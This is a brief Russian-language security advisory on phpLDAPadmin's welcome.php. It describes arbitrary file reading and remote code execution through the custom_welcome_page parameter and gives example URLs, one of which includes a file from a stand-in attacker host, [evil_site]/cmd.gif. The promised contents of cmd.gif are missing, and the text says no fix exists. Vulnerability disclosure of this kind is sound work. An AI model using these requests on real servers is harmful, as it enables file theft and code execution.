Описание:
Пользователь может просмтаривать любой файл на системе.
Пример:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=[/file]
Пользователь может выполнить произвольный код на уязвимой системе.
Пример:
http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif
Где файл cmd.gif, может быть следующего содержания:
Решение: На данный момент не существует.